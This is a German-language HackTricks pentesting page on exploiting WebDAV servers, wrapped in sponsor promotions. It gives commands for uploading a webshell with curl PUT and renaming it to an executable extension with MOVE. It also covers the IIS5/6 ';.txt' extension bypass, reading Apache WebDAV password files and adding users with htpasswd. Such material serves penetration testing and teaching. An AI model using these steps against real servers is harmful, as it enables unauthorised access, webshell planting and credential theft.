# WebDav
\ Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav), um **Workflows zu erstellen und zu automatisieren**, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\ Heute Zugriff erhalten: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! Andere Möglichkeiten, HackTricks zu unterstützen: * Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! * Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) * Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) * **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
Beim Umgang mit einem **HTTP-Server mit aktiviertem WebDav** ist es möglich, Dateien zu **manipulieren**, wenn Sie über die richtigen **Anmeldeinformationen** verfügen, die in der Regel über die **HTTP-Basisauthentifizierung** überprüft werden. Die Kontrolle über einen solchen Server zu erlangen, beinhaltet oft das **Hochladen und Ausführen einer Webshell**. Der Zugriff auf den WebDav-Server erfordert in der Regel **gültige Anmeldeinformationen**, wobei [**WebDav-Brute-Force**](../../generic-methodologies-and-resources/brute-force.md#http-basic-auth) eine häufige Methode ist, um sie zu erhalten. Um Beschränkungen bei Datei-Uploads zu überwinden, insbesondere solche, die die Ausführung von serverseitigen Skripten verhindern, könnten Sie: * Dateien mit **ausführbaren Erweiterungen** direkt hochladen, wenn sie nicht eingeschränkt sind. * Umbenennen von hochgeladenen nicht ausführbaren Dateien (wie .txt) in eine ausführbare Erweiterung. * Kopieren von hochgeladenen nicht ausführbaren Dateien und Ändern ihrer Erweiterung in eine ausführbare Erweiterung. ## DavTest **Davtest** versucht, **mehrere Dateien mit verschiedenen Erweiterungen hochzuladen** und zu **überprüfen**, ob die Erweiterung **ausgeführt wird**: ```bash davtest [-auth user:password] -move -sendbd auto -url http:// #Uplaod .txt files and try to move it to other extensions davtest [-auth user:password] -sendbd auto -url http:// #Try to upload every extension ``` ![](<../../.gitbook/assets/image (851).png>) Das bedeutet nicht, dass **.txt**- und **.html-Erweiterungen ausgeführt werden**. Dies bedeutet, dass Sie auf diese Dateien **über das Web zugreifen** können. ## Cadaver Sie können dieses Tool verwenden, um sich mit dem WebDav-Server zu **verbinden** und Aktionen (wie **Hochladen**, **Verschieben** oder **Löschen**) **manuell** durchzuführen. ``` cadaver ``` ## PUT-Anfrage ``` curl -T 'shell.txt' 'http://$ip' ``` ## MOVE-Anforderung ``` curl -X MOVE --header 'Destination:http://$ip/shell.php' 'http://$ip/shell.txt' ```
\ Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav), um einfach **Workflows zu erstellen** und zu **automatisieren**, die von den fortschrittlichsten Community-Tools der Welt unterstützt werden.\ Heute Zugriff erhalten: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %} ## IIS5/6 WebDav-Schwachstelle Diese Schwachstelle ist sehr interessant. Der **WebDav** erlaubt es **nicht**, Dateien mit der Erweiterung **.asp** hochzuladen oder umzubenennen. Aber Sie können dies **umgehen**, indem Sie am Ende des Namens **";.txt"** hinzufügen und die Datei wird **ausgeführt**, als ob es eine .asp-Datei wäre (Sie könnten auch **".html" anstelle von ".txt"** verwenden, aber **vergessen Sie das ";" nicht**). Dann können Sie Ihre Shell als ".**txt-Datei**" hochladen und sie in eine ".asp;.txt-Datei" **kopieren/verschieben**. Wenn Sie auf diese Datei über den Webserver zugreifen, wird sie **ausgeführt** (cadaver wird sagen, dass die Verschiebeaktion nicht funktioniert hat, aber das hat sie). ![](<../../.gitbook/assets/image (1092).png>) ## Post-Credentials Wenn der Webdav einen Apache-Server verwendet, sollten Sie die konfigurierten Websites in Apache überprüfen. Üblicherweise:\ _**/etc/apache2/sites-enabled/000-default**_ Darin könnten Sie etwas wie: ``` ServerAdmin webmaster@localhost Alias /webdav /var/www/webdav DAV On AuthType Digest AuthName "webdav" AuthUserFile /etc/apache2/users.password Require valid-user ``` Wie Sie sehen können, gibt es die Dateien mit den gültigen **Anmeldedaten** für den **WebDAV**-Server: ``` /etc/apache2/users.password ``` Innerhalb dieser Art von Dateien finden Sie den **Benutzernamen** und einen **Hash** des Passworts. Dies sind die Anmeldeinformationen, die der WebDAV-Server verwendet, um Benutzer zu authentifizieren. Sie können versuchen, sie zu **knacken**, oder **weitere hinzufügen**, wenn Sie aus irgendeinem Grund auf den **WebDAV**-Server **zugreifen** möchten: ```bash htpasswd /etc/apache2/users.password #You will be prompted for the password ``` Um zu überprüfen, ob die neuen Anmeldedaten funktionieren, können Sie Folgendes tun: ```bash wget --user --ask-password http://domain/path/to/webdav/ -O - -q ``` ## Referenzen * [https://vk9-sec.com/exploiting-webdav/](https://vk9-sec.com/exploiting-webdav/)
Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! Andere Möglichkeiten, HackTricks zu unterstützen: * Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! * Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com) * Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) * **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen.
\ Verwenden Sie [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_content=put-method-webdav), um mühelos **Workflows zu erstellen und zu automatisieren**, die von den weltweit **fortschrittlichsten** Community-Tools unterstützt werden.\ Heute Zugriff erhalten: {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=put-method-webdav" %}